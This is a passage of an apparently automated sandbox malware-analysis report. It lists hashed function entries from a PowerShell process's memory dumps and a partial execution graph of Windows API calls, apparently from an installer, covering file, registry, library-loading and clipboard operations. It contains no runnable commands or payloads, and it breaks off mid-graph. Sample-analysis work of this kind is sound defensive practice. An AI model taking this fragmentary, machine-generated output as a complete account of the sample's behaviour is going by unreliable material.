                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2125737707.00007FFD9B2CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2CD000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b2cd000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b8386a30c639676292a66e4ab27e15d85499dfabbe7cf3b72463a7a60e889bca
                                                                                                                                                                                                                                                    • Instruction ID: 3929c7441e0c51e735920d93e7aac7bef59f609de034d0f3b96fc5c5f946e670
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8386a30c639676292a66e4ab27e15d85499dfabbe7cf3b72463a7a60e889bca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A41157140EBC44FE766AB39D8559623FF0EF56320B1606DFD088CB1A3D625B846C7A2
                                                                                                                                                                                                                                                    Function 00007FFD9B4B426F Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 804c8406c9aa85fe7b2dd23a59c76b6ac4bb86130c90726098b27d9fd74a89e7
                                                                                                                                                                                                                                                    • Instruction ID: 89d9d55e10987e35441e7c70f6a7b2e08908afcc406676eda8127df7d178bb0d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 804c8406c9aa85fe7b2dd23a59c76b6ac4bb86130c90726098b27d9fd74a89e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621E523B0E95A0FE7BDCB5C546117876D1EF5035874A01BED25DC71E2CE18EC04AA82
                                                                                                                                                                                                                                                    Function 00007FFD9B3EC6D1 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 66d60a874b8624b421b07fb33a53568edc43e6d9008f280db89017bb8d553167
                                                                                                                                                                                                                                                    • Instruction ID: d31b5006325f8ef263d4abb335ea731c2ca58afde82f4ec2c7c84afab156e4e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d60a874b8624b421b07fb33a53568edc43e6d9008f280db89017bb8d553167
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35211B31A1894D8FDF98EF58C455EEDB7A1FF68310F55016AD40AD7296CA24EC82CBC1
                                                                                                                                                                                                                                                    Function 00007FFD9B4B456C Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2db57d31e03f5e260f9bdff5c26d2b06b17d6851609650a8b95421c3fbbd8653
                                                                                                                                                                                                                                                    • Instruction ID: 10e888a19e6abb514759635f79bba6fcdc427d284c5aeed366299e7b16c96a8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2db57d31e03f5e260f9bdff5c26d2b06b17d6851609650a8b95421c3fbbd8653
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C111C132A0E9990FE7B5D79844649B87BD0FF04328B5A01FEE25DC70A7DA18AD019B81
                                                                                                                                                                                                                                                    Function 00007FFD9B3E3AC5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bba1f6f2c3413fea2861be6c54a280d72ca63e2477c7ece28d0edd84f54e719d
                                                                                                                                                                                                                                                    • Instruction ID: c5acc29962d536c393317c1d71d6ee65ded51257c2ec840508e91a7300ca2935
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba1f6f2c3413fea2861be6c54a280d72ca63e2477c7ece28d0edd84f54e719d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501A73021CB0C8FD748EF4CE051AB5B7E0FB95324F50056EE58AC36A1D636E882CB41

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FFD9B3E8A5C Relevance: 7.7, Strings: 6, Instructions: 208COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                    • API String ID: 0-1364355708
                                                                                                                                                                                                                                                    • Opcode ID: 23a042ca7da7d5eff138762370b32f576ad985e8018a655b08c29e694c1960c2
                                                                                                                                                                                                                                                    • Instruction ID: b68e7a872e442696b099ee14216ba47742d0d71518eeb7537258a41753cc7190
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23a042ca7da7d5eff138762370b32f576ad985e8018a655b08c29e694c1960c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F161A393F1F9CB4BE775A6992C750606B91EF61358B0A03FBC1988B1E3ED1929074246
                                                                                                                                                                                                                                                    Function 00007FFD9B3E87F2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                    • API String ID: 0-3900292545
                                                                                                                                                                                                                                                    • Opcode ID: fe2f3c3b9851b6409a836a89c460dfdc0715d768fd2f8491b5b7ee6f8b668e21
                                                                                                                                                                                                                                                    • Instruction ID: d4f532eeb521295e9dbe6c15893411f46617b98a04305820e6b13d8591841fa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe2f3c3b9851b6409a836a89c460dfdc0715d768fd2f8491b5b7ee6f8b668e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31EC56D0F7C51FE763A6B828754953FA06F13654B0B02FBC5E98F0F3E958294A8322

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:17.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:12.4%
                                                                                                                                                                                                                                                    Total number of Nodes:1482
                                                                                                                                                                                                                                                    Total number of Limit Nodes:27
                                                                                                                                                                                                                                                    execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b 